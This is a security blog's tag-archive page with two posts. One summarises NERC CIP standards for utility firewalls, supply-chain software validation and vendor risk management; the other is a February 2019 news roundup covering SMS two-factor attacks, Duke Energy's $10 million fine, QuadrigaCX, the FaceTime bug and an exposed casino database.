Tag Archives: NERC

Regulators Update Cyber Security Regs for Electric Utilities

Very few of my readers run electric utilities – those are the ones that these regulations apply to directly.

Then there are folks who are suppliers to utilities.  And suppliers to those suppliers.  The new regs require that utilities have a decent vendor cyber risk management program.  That increases the pool of interested parties a bit.

Then there are those folks who use electricity and would appreciate it if their lights stay on.  Except for those who run their own wind or solar farms, that is the rest of us.

And of course, last, but not least, there are other regulators who are going to watch and say “hey, that sounds like a good regulation;  I think I will adopt it for people who do business in my industry or my state”.

So what is in the new regs?

The regulator is NERC – The North American Electric Reliability Corporation.  NERC is a quasi-governmental agency that sets forth standards for the electric utilities to follow.  They call the rules Critical Infrastructure Protection (CIP).

Note that I am only going to touch on the tip of the regulatory iceberg here, but I will give you a link to all of the CIP regs at the end in case you want to steal some of their ideas.

CIP 005-6 Electronic Security Perimeter

Note all the leading zeros in the rule number.  Room for up to a thousand rules.  Plus the sub-rules.  That’s pretty scary.

This rule adds detailed requirements for firewalls, DMZs and network segmentation.  Probably a good idea for everyone.   This includes a requirement to be able to know how many active vendor remote sessions you have (as opposed to employees) and have a way to disable them.  Again, probably a good idea for everyone.

CIP 010-3 Configuration Change Management and Vulnerability Assessments

Again, change control and vulnerability assessments should be things that everyone is doing anyway.  One thing this requires is that you be able to validate that every piece of software in your supply chain.  Can you do that?  Do you even know what software is in your supply chain.  Think of this as software bill of materials (BOM) on steroids.  Once you do know what software is in your supply chain then that helps with vulnerability assessments.  But how do you “validate” each piece of software?  They suggest with crypto checksums for everything.  Ask Equifax.  It is not as easy as it sounds.

CIP 013-1 Supply chain risk management

This may well be the most complex part.  Most companies have a lot of suppliers.  Big companies have thousands.  Small companies have hundreds.  The number of vendors is amazing.  They require a written program and remember, those vendors have vendors.  And the whole process has to be signed off on by an executive who’s head is on the proverbial chopping block.

Check these CIPs out and see if any of them make sense to you.  Then adopt them.

All of NERC’s CIP standards can be found here.

And, just in case you are thinking this is just some private regulator with no clout.  Last year they fined an unnamed regulator (which everyone knows is Duke Energy) $10 million for violating the rules.

Facebooktwitterredditlinkedinmailby feather

Security News Bites for the Week Ending February 8, 2019

Text Messaging for Two Factor Authentication is Under Attack

We have talked on occasion about a basically theoretical attack against text messages as the second factor for authentication.  It is likely that the feds know more than they are telling us about that since the National Institute of Standards and Technology has deprecated the use of text messaging for two factor for new systems.

Now we are seeing a large, in the wild, attack against real two factor authentication, specifically in banking.

Britain’s National Cyber Security Centre (NCSC), part of their GCHQ spy-guys, admitted that they are aware that this is being exploited.   As are the telephone carriers.

The attack vector still requires a very sophisticated hacker because it requires the attacker to compromise some phone company and inject fake SS7 commands into the system for the targeted phone number.  Hard, but far from impossible.

Still, in light of this being a real-world-empty-your-bank-account kind of attack, financial institutions should begin the transition away from text messaging to two factor apps (like Google Authenticator and others) to protect client accounts sooner rather than later.  Source: Motherboard.

 

Unnamed Energy Company (Duke) Fined $10 Million for Security Lapses

An unnamed energy company received the largest fine of its type ever at $10 million for security lapses,  including letting unauthorized people into secure areas and allowing uncleared computers to connect to secure networks, sometimes for months at a time.

The fine covers 130 violations.

The reason the company is unnamed is that it is likely the list of identified vulnerabilities is not complete and the identified holes are not all closed.

The WSJ reports that the company is Duke Energy.  So much for keeping their name out of the media.

This certainly could explain why many people say that the bad guys already “own” our energy utilities.  Source: Biz Journals.

 

Another Cryptocurrency Debacle

I keep saying that attacks on Cryptocurrency will not be on the math (encryption) but rather on the systems and software.

This week QuadrigaCX filed for the Canadian version of bankruptcy protection saying that they stored the vast majority of their assets in offline storage wallets and the only person who had the key was their CEO, who died suddenly.

They claim to have lost access to $145 million in a variety of cryptocurrencies and do not have the money to repay their customers.

Some users and researchers are skeptical of this story (really, no backup?  To over $140 million)?  Seems hard to swallow.

The researchers, after looking at the block chain, say that they can find no evidence that QuadrigaCX has anything close to $100 million in Bitcoin and perhaps the founder’s death was faked as an exit scam.

Assuming this all plays out the way it seems, customers are going to be waving bye-bye to $145 million of their cold, hard crypto coins.  Source: The Hacker News.

 

Apple to Release iOS 12.1.4 to Fix Facetime Bug This Week

In what has got to be the worst iPhone bug in a long time – one that allowed hackers to eavesdrop on iPhone users by exploiting a Facetime bug until Apple deactivated group calls on Facetime worldwide – Apple seems to be slow to respond.  Uncharacteristically.  Very.  Slow.

My guess is that the problem was technically hard to fix even though it was technically easy to exploit.  In any case, iOS 12.1.4 should be out this week and it is supposed to fix the security hole. Source: ZDNet .

 

Online Casino Leaves Data on 100+ Million Bets Unprotected

Security Researcher Justin Paine found a public Elastic Search database unprotected online.

Contents include information such as name, address, birthdate, email, phone, etc. as well as bet information such as winnings amount.   When ZDnet reached out to the companies involved – there seems to be multiple companies with some common ownership and based in Cyprus and operating under a Curacao gaming license, they did not immediately reply, but the server went dark.

The company, Mountberg Limited, did reach out later thanking Justin for letting them know, but not making any statement about their client’s data.  Source: ZDNet .

 

Germany Tells Facebook Not to Combine User Data Without Explicit Permission 

The Europeans are not happy with U.S. big tech.

In a ruling NOT related to GDPR, Germany’s Federal Cartel Office (FCO) says that Facebook cannot combine Instagram, Whatsapp and third party data into the user’s Facebook profile without explicit user permission and having the user check a box that says, something like, “we are going to do some stuff; you should read our 19 page description” is not adequate.

The regulator says that by doing this Facebook is abusing its monopoly power.  Facebook, not surprisingly disagrees and says that the regulator is out of line.  Stay tuned.  If this rule stands, it could have a big impact on all companies that aggregate data from third parties without fully telling their clients.  Source: BBC .Facebooktwitterredditlinkedinmailby feather